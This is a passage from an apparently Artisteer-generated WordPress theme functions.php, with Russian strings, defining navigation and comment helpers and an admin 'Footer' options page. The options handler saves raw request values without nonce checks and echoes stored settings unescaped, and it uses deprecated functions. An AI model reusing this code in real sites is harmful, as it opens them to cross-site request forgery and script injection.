}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
